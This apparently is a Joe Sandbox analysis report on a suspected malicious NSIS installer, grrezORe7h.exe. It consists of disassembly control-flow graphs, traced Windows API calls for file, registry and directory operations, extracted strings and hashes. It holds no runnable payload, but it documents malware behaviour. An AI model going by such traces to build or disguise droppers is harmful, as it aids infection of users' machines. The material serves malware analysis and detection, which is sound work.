                                                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                                      • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                      • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                      • String ID: "C:\Users\user\Desktop\grrezORe7h.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                      • API String ID: 606308-253723719
                                                                                                                      • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                      • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                      • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                      • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 438 403020-403024 437->438 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 448 402e81-402e98 446->448 450 402e9a 448->450 451 402e9c-402ea5 call 403242 448->451 450->451 458 402eab-402eb2 451->458 459 402fcd-402fd5 call 402d8a 451->459 456 402f78-402f90 call 403258 call 403242 452->456 457 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->457 453->438 456->453 480 402f92-402f98 456->480 457->453 484 402fd7-402fe8 457->484 462 402eb4-402ec8 call 405be5 458->462 463 402f2e-402f32 458->463 459->453 471 402f3c-402f42 462->471 482 402eca-402ed1 462->482 470 402f34-402f3b call 402d8a 463->470 463->471 470->471 475 402f51-402f5b 471->475 476 402f44-402f4e call 4064dc 471->476 475->448 483 402f61 475->483 476->475 480->453 480->457 482->471 486 402ed3-402eda 482->486 483->445 487 402ff0-402ff5 484->487 488 402fea 484->488 486->471 489 402edc-402ee3 486->489 490 402ff6-402ffc 487->490 488->487 489->471 491 402ee5-402eec 489->491 490->490 492 402ffe-403019 SetFilePointer call 405be5 490->492 491->471 494 402eee-402f0e 491->494 495 40301e 492->495 494->453 496 402f14-402f18 494->496 495->438 497 402f20-402f28 496->497 498 402f1a-402f1e 496->498 497->471 499 402f2a-402f2c 497->499 498->483 498->497 499->471
                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\grrezORe7h.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                        • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\grrezORe7h.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                        • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\grrezORe7h.exe,C:\Users\user\Desktop\grrezORe7h.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                      • String ID: "C:\Users\user\Desktop\grrezORe7h.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\grrezORe7h.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                      • API String ID: 4283519449-3844313462
                                                                                                                      • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                      • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                      • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                      • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 826 401767-40178c call 402bbf call 405a80 831 401796-4017a8 call 406055 call 405a09 lstrcatW 826->831 832 40178e-401794 call 406055 826->832 838 4017ad-4017ae call 4062e9 831->838 832->838 841 4017b3-4017b7 838->841 842 4017b9-4017c3 call 406398 841->842 843 4017ea-4017ed 841->843 850 4017d5-4017e7 842->850 851 4017c5-4017d3 CompareFileTime 842->851 845 4017f5-401811 call 405c2a 843->845 846 4017ef-4017f0 call 405c05 843->846 853 401813-401816 845->853 854 401885-4018ae call 4051b4 call 403027 845->854 846->845 850->843 851->850 855 401867-401871 call 4051b4 853->855 856 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 853->856 868 4018b0-4018b4 854->868 869 4018b6-4018c2 SetFileTime 854->869 866 40187a-401880 855->866 856->841 889 40185c-40185d 856->889 870 402a55 866->870 868->869 872 4018c8-4018d3 CloseHandle 868->872 869->872 876 402a57-402a5b 870->876 874 4018d9-4018dc 872->874 875 402a4c-402a4f 872->875 878 4018f1-4018f4 call 406077 874->878 879 4018de-4018ef call 406077 lstrcatW 874->879 875->870 883 4018f9-40228d call 40579a 878->883 879->883 883->876 889->866 891 40185f-401860 889->891 891->855
                                                                                                                      APIs
                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets,?,?,00000031), ref: 004017A8
                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets,?,?,00000031), ref: 004017CD
                                                                                                                        • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                        • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                        • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                        • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                        • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets$C:\Users\user\AppData\Local\Temp\nsuC465.tmp$C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll$Call
                                                                                                                      • API String ID: 1941528284-3966245810
                                                                                                                      • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                      • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                      • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                      • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 892 403027-40303e 893 403040 892->893 894 403047-403050 892->894 893->894 895 403052 894->895 896 403059-40305e 894->896 895->896 897 403060-403069 call 403258 896->897 898 40306e-40307b call 403242 896->898 897->898 902 403230 898->902 903 403081-403085 898->903 904 403232-403233 902->904 905 4031db-4031dd 903->905 906 40308b-4030d4 GetTickCount 903->906 909 40323b-40323f 904->909 907 40321d-403220 905->907 908 4031df-4031e2 905->908 910 403238 906->910 911 4030da-4030e2 906->911 912 403222 907->912 913 403225-40322e call 403242 907->913 908->910 914 4031e4 908->914 910->909 915 4030e4 911->915 916 4030e7-4030f5 call 403242 911->916 912->913 913->902 925 403235 913->925 918 4031e7-4031ed 914->918 915->916 916->902 924 4030fb-403104 916->924 921 4031f1-4031ff call 403242 918->921 922 4031ef 918->922 921->902 930 403201-40320d call 405cdc 921->930 922->921 927 40310a-40312a call 40654a 924->927 925->910 934 403130-403143 GetTickCount 927->934 935 4031d3-4031d5 927->935 936 4031d7-4031d9 930->936 937 40320f-403219 930->937 938 403145-40314d 934->938 939 40318e-403190 934->939 935->904 936->904 937->918 940 40321b 937->940 941 403155-40318b MulDiv wsprintfW call 4051b4 938->941 942 40314f-403153 938->942 943 403192-403196 939->943 944 4031c7-4031cb 939->944 940->910 941->939 942->939 942->941 947 403198-40319f call 405cdc 943->947 948 4031ad-4031b8 943->948 944->911 945 4031d1 944->945 945->910 953 4031a4-4031a6 947->953 949 4031bb-4031bf 948->949 949->927 952 4031c5 949->952 952->910 953->936 954 4031a8-4031ab 953->954 954->949
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountTick$wsprintf
                                                                                                                      • String ID: jA$ jA$... %d%%
                                                                                                                      • API String ID: 551687249-2167919867
                                                                                                                      • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                      • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                      • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                      • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 955 4025e5-4025fa call 402ba2 958 402600-402607 955->958 959 402a4c-402a4f 955->959 960 402609 958->960 961 40260c-40260f 958->961 962 402a55-402a5b 959->962 960->961 963 402773-40277b 961->963 964 402615-402624 call 405fb5 961->964 963->959 964->963 968 40262a 964->968 969 402630-402634 968->969 970 4026c9-4026cc 969->970 971 40263a-402655 ReadFile 969->971 972 4026e4-4026f4 call 405cad 970->972 973 4026ce-4026d1 970->973 971->963 974 40265b-402660 971->974 972->963 984 4026f6 972->984 973->972 975 4026d3-4026de call 405d0b 973->975 974->963 977 402666-402674 974->977 975->963 975->972 980 40267a-40268c MultiByteToWideChar 977->980 981 40272f-40273b call 405f9c 977->981 980->984 985 40268e-402691 980->985 981->962 988 4026f9-4026fc 984->988 986 402693-40269e 985->986 986->988 989 4026a0-4026c5 SetFilePointer MultiByteToWideChar 986->989 988->981 990 4026fe-402703 988->990 989->986 991 4026c7 989->991 992 402740-402744 990->992 993 402705-40270a 990->993 991->984 994 402761-40276d SetFilePointer 992->994 995 402746-40274a 992->995 993->992 996 40270c-40271f 993->996 994->963 998 402752-40275f 995->998 999 40274c-402750 995->999 996->963 997 402721-402727 996->997 997->969 1000 40272d 997->1000 998->963 999->994 999->998 1000->963
                                                                                                                      APIs
                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                        • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                      • String ID: 9
                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                      • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                      • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                      • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                      • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1001 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 1008 4023c7-4023cf 1001->1008 1009 402a4c-402a5b 1001->1009 1010 4023d1-4023de call 402bbf lstrlenW 1008->1010 1011 4023e2-4023e5 1008->1011 1010->1011 1014 4023f5-4023f8 1011->1014 1015 4023e7-4023f4 call 402ba2 1011->1015 1019 402409-40241d RegSetValueExW 1014->1019 1020 4023fa-402404 call 403027 1014->1020 1015->1014 1023 402422-4024fc RegCloseKey 1019->1023 1024 40241f 1019->1024 1020->1019 1023->1009 1026 40281e-402825 1023->1026 1024->1023 1026->1009
                                                                                                                      APIs
                                                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuC465.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsuC465.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsuC465.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsuC465.tmp
                                                                                                                      • API String ID: 1356686001-2730403437
                                                                                                                      • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                      • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                      • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                      • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1027 405683-4056ce CreateDirectoryW 1028 4056d0-4056d2 1027->1028 1029 4056d4-4056e1 GetLastError 1027->1029 1030 4056fb-4056fd 1028->1030 1029->1030 1031 4056e3-4056f7 SetFileSecurityW 1029->1031 1031->1028 1032 4056f9 GetLastError 1031->1032 1032->1030
                                                                                                                      APIs
                                                                                                                      • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                      • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                      • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                      • API String ID: 3449924974-3081826266
                                                                                                                      • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                      • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                      • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                      • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1033 10001759-10001795 call 10001b18 1037 100018a6-100018a8 1033->1037 1038 1000179b-1000179f 1033->1038 1039 100017a1-100017a7 call 10002286 1038->1039 1040 100017a8-100017b5 call 100022d0 1038->1040 1039->1040 1045 100017e5-100017ec 1040->1045 1046 100017b7-100017bc 1040->1046 1049 1000180c-10001810 1045->1049 1050 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 1045->1050 1047 100017d7-100017da 1046->1047 1048 100017be-100017bf 1046->1048 1047->1045 1056 100017dc-100017dd call 10002b5f 1047->1056 1052 100017c1-100017c2 1048->1052 1053 100017c7-100017c8 call 100028a4 1048->1053 1054 10001812-1000184c call 100015b4 call 100024a9 1049->1054 1055 1000184e-10001854 call 100024a9 1049->1055 1074 10001855-10001859 1050->1074 1058 100017c4-100017c5 1052->1058 1059 100017cf-100017d5 call 10002645 1052->1059 1065 100017cd 1053->1065 1054->1074 1055->1074 1068 100017e2 1056->1068 1058->1045 1058->1053 1073 100017e4 1059->1073 1065->1068 1068->1073 1073->1045 1075 10001896-1000189d 1074->1075 1076 1000185b-10001869 call 1000246c 1074->1076 1075->1037 1081 1000189f-100018a0 GlobalFree 1075->1081 1083 10001881-10001888 1076->1083 1084 1000186b-1000186e 1076->1084 1081->1037 1083->1075 1086 1000188a-10001895 call 1000153d 1083->1086 1084->1083 1085 10001870-10001878 1084->1085 1085->1083 1087 1000187a-1000187b FreeLibrary 1085->1087 1086->1075 1087->1083
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
